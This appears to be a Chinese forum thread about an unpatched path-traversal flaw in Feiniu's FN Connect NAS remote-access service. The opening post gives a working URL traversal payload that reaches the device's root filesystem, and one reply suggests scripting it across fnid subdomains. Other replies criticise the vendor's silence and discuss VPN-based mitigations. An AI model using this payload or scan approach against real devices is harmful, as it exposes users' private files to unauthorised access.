飞牛这个漏洞 POC 太容易了啊

1 月 31 日
 Tink
打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上

/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../

直接就到 /了啊

太离谱了
5006 次点击
所在节点    信息安全
42 条回复
stinkytofux
1 月 31 日
0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.
Tink
1 月 31 日
@stinkytofux 官方为什么不强推新版本呢,强制修复漏洞
Joming
1 月 31 日
TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了!
wfhtqp
1 月 31 日
问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了
wfhtqp
1 月 31 日
https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。
YJBZC
1 月 31 日
@wfhtqp 我草,飞牛官方团队在一个多月前就知道这个漏洞了,到今天都没发个公告或者强制更新修复
wfhtqp
2 天前
@YJBZC 这才哪到哪? fn connect 还开着呢
labubu
2 天前
不是绑定手机了吗,打电话发短信给用户呗?
bitkuang
2 天前
没复现出来,还有别的条件吧
haoshuaiwang
2 天前
写个脚本跑就行了

{fnid}.fnos.net
baton
2 天前
经历过宝塔后就不敢用国内这些面板,安全性是个大问题
a9htdkbv
2 天前
还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了
emoker
2 天前
@baton 请教宝塔具体是啥问题?之前没关注过
AkinoKaedeChan
2 天前
flyqie
2 天前
是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。
yinanc
1 天前
@flyqie 估计就国内处理问题的一贯思路,装死等这波舆论过去了,就可以当没有发生了
emoker
1 天前
@AkinoKaedeChan 感谢大佬
stinkytofux
1 天前
ryd994
1 天前
我相信有很多人就是图个 fnconnect 的方便。这下好了,不能开公网,不能用 fnconnect ,结果还是要自己配置 VPN/zerotier 。

我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问,后者经过 zero trust 的鉴权。所有不登入就能访问的服务(比如 BT )都跑在容器里。
hanguofu
1 天前
@ryd994 : 请问你是自己买了一个域名并用 cf 代理吗 ?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1189806

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX